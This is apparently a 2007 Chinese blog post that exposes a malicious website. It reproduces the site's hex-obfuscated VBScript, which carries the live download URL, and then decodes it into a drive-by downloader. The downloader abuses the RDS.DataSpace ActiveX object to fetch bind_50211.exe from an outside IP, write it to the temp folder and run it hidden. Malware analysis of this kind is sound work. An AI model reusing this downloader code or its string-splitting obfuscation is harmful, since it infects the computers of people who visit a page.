Fucking 这个网站!

昨天写了一个人不能无耻到这个地步的文章,今天把它的面目重新揭露一下

在系统注入到Explorer.exe,之后不停的连接到202.109.237.59/ku.htm

仔细分析,该网站的代码:

script language="VBScript"
S="6F6E206572726F7220726573756D65206E6578740D0A6375726C3D22687474703A2F2F3230322E3130392E3233372E35392F62696E645F35303231312E657865220D0A666E616D65313D2262696E645F35303231312E657865220D0A536574206466203D"
S=S+"20646F63756D656E742E637265617465456C656D656E7428226F626A65637422290D0A64662E7365744174747269627574652022636C6173736964222C2022636C7369643A42443936433535362D363541332D313144302D393833412D30304330344643"
S=S+"3239453336220D0A7374723D224D6963726F736F66742E584D4C48545450220D0A5365742078203D2064662E4372656174654F626A656374287374722C2222290D0A43313D2241646F220D0A43323D2264622E220D0A43333D22737472220D0A43343D22"
S=S+"65616D220D0A737472313D43312643322643332643340D0A737472353D737472310D0A7365742053203D2064662E6372656174656F626A65637428737472352C2222290D0A532E74797065203D20310D0A737472363D22474554220D0A782E4F70656E20"
S=S+"737472362C206375726C2C2046616C73650D0A782E53656E640D0A73313D22536372697074220D0A73323D22696E672E220D0A73333D2246696C65220D0A73343D2253797374656D4F626A656374220D0A73303D73312B73322B73332B73340D0A736574"
S=S+"2046203D2064662E6372656174656F626A6563742873302C2222290D0A73657420746D70203D20462E4765745370656369616C466F6C6465722832290D0A666E616D65313D20462E4275696C645061746828746D702C666E616D6531290D0A532E6F7065"
S=S+"6E0D0A532E777269746520782E726573706F6E7365426F64790D0A532E73617665746F66696C6520666E616D65312C320D0A532E636C6F73650D0A696620462E46696C6545786973747328666E616D6531293D74727565207468656E0D0A202020207365"
S=S+"742051203D2064662E6372656174656F626A65637428225368656C6C2E4170706C69636174696F6E222C2222290D0A20202020512E5368656C6C4578656375746520666E616D65312C22222C22222C226F70656E222C300D0A656E642069660D0A"
D=""
DO WHILE LEN(S)>1
k="&H"+LEFT(S,2)
p=CLng(k)
m=chr(p)
D=D&m
S=MID(S,3)
LOOP

把执行的部分去掉.转换后是:

on error resume next
curl="(防止误连,屏蔽)202.109.237.59/bind_50211.exe"
fname1="bind_50211.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
C1="Ado"
C2="db."
C3="str"
C4="eam"
str1=C1&C2&C3&C4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, curl, False
x.Send
s1="Script"
s2="ing."
s3="File"
s4="SystemObject"
s0=s1+s2+s3+s4
set F = df.createobject(s0,"")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
if F.FileExists(fname1)=true then
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
end if

下载了bind_05211.exe后又通过这个拉圾又执行了一大堆的拉圾.

不知道这种人渣活着是为了什么.

posted @ 2007-04-05 13:59  Jeffers Yuan  阅读(2115)  评论(2编辑  收藏  举报